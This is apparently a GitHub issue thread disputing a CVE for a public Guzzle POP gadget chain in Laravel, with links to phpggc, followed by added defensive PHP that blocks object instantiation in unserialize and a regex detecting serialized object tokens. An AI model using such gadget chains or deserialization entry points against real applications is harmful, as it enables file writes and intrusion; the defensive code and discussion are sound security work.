Open 1nhann opened 2 years ago
Tested and confirmed working on Laravel v9.12.2 (PHP v8.1.5).
Hi!
Thank you @1nhann @GlitchWitch for sharing this,
This is a guzzle POP chain (file write) and has been public for years. For example: https://github.com/ambionics/phpggc/commit/911dbb541233de733134caed872f4cc9fc9efd71#diff-440f971a668a7be90201d1ee799993d495af0eb2673c7fde1b58918bcf019fa4 in 2017.
In any software that uses Guzzle, you can use this chain to write a file, and it's not limited to Laravel. (Object Injection using the unserialize function or PHAR deserialization in PHP<8 is required.)
You can test it with https://github.com/ambionics/phpggc/ (please try Guzzle/FW1: https://github.com/ambionics/phpggc/blob/master/gadgetchains/Guzzle/FW/1/gadgets.php).
I don't know why @CVEProject assigned a CVE for a chain because it's NOT a vulnerability.
Thank you.
I did not check whether the POP chain I built already existed before I posted it, because I thought the latest Laravel should have fixed all the potential vulnerabilities of unserializing, that is, POP chains that were found before should not work in the latest Laravel, and what I built should be a new one. So it is really a mistake, and I am really sorry. So if the CVE will not be revoked, then it should not be credited to me.
@1nhann, if you requested the CVE for this issue you should contact Mitre and ask for it to be revoked. Thank you for acknowledging that this is not a vulnerability 👍
It seems the NVD has assigned a critical severity to this POP chain (5/24/2022). CVSS3.1: 9.8/10 link
Also, it's NOT the first time that MITRE has assigned a CVE for a chain. Example: CVE-2021-43503
I think documenting these types of security risks is very good, but assigning a CVE to them is NOT a good idea.
Maybe @cve-team or @darakian (Github security team) will find another way to document it, something like SRE-2022-????? (Security Risk Enumeration) or EF-2022-????? (Exploitation Facilitator) to have a dictionary of potential security risks and inform users about them.
There are other security risks in famous packages/libraries that users use but are unaware of (I don't mean POP chains only). A dictionary will help (I think).
Thank you.
@mir-hossein we (github) can't change the CVE, but we are omitting this from our advisory database to keep the noise down. To get this changed outside of github the CVE itself will need to be revoked and/or marked as disputed.
To revoke it, the requestor (@1nhann I think) should reach out to Mitre, inform them that the CVE was requested erroneously, and ask that it be revoked.
To get this disputed, the Laravel folks will need to get involved, contact Mitre, and inform them that the vulnerability does not affect the project.
@darakian Thank you!
Hello! Is this vulnerability fixed yet, and does it only concern Laravel version 9.1.8?
Hello @arijgr,
This isn't a vulnerability, just a GC. If you don't use the unserialize function (with user-controlled input), don't worry about it.
routes/web.php: [poc image]
result: [attack image]
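The mitigation stated in the thread (never hand user-controlled input to unserialize) is the whole defence against this class of gadget chain. The following PHP is an added example, not code from the thread, from Laravel, or from Guzzle; the function names safeUnserialize and containsObjectToken and the sample payloads are constructed for illustration. It shows the allowed_classes option that stops PHP from instantiating any class during deserialization, so a chain's __wakeup/__destruct methods never run, plus a conservative pre-check that flags serialized data carrying object tokens at all.

```php
<?php
// Added example (not from the thread): keeping untrusted input away from PHP object
// instantiation during deserialization. Requires PHP 7.0+ for allowed_classes, 8.0+ for mixed.
declare(strict_types=1);

/**
 * Hardened wrapper around unserialize(): with allowed_classes => false every O:/C:
 * token becomes a __PHP_Incomplete_Class, so no gadget class is ever constructed and
 * no magic method of the payload's classes can fire. Returns null on malformed input.
 */
function safeUnserialize(string $payload): mixed
{
    $value = @unserialize($payload, ['allowed_classes' => false]);
    // unserialize() returns false both for errors and for a genuine serialized false
    if ($value === false && $payload !== serialize(false)) {
        return null;
    }
    return $value;
}

/**
 * Conservative pre-check for inputs that should only ever carry scalars/arrays:
 * true if the payload declares an object (O:) or custom-serialized class (C:).
 * It may flag a string value that merely contains such a token, which is acceptable
 * for a deny-by-default filter.
 */
function containsObjectToken(string $payload): bool
{
    return preg_match('/(^|[;{])[OC]:\d+:"/', $payload) === 1;
}

// Constructed sample inputs (hypothetical, not taken from the thread)
$scalarPayload = serialize(['id' => 42, 'name' => 'demo']);
$objectPayload = 'a:1:{i:0;O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}}'; // harmless object, for demonstration

var_dump(containsObjectToken($scalarPayload)); // bool(false)
var_dump(containsObjectToken($objectPayload)); // bool(true)

$decoded = safeUnserialize($objectPayload);
// The nested object survives only as an inert placeholder: stdClass was never instantiated
var_dump($decoded[0] instanceof __PHP_Incomplete_Class); // bool(true)

// Preferred option where the data is not legitimately object-shaped: a format with no
// class instantiation at all (json_decode with assoc=true yields plain arrays only).
var_dump(json_decode('{"id":42,"name":"demo"}', true)['id']); // int(42)
```

Where an application needs PHP objects across a trust boundary, the allowed_classes option can instead take an explicit list of class names; anything outside the list is still turned into __PHP_Incomplete_Class. The PHAR path mentioned in the thread is a separate entry point: on PHP < 8, file operations on a user-supplied phar:// path deserialize the archive's metadata, so user-controlled paths should be validated against the stream wrappers they may use.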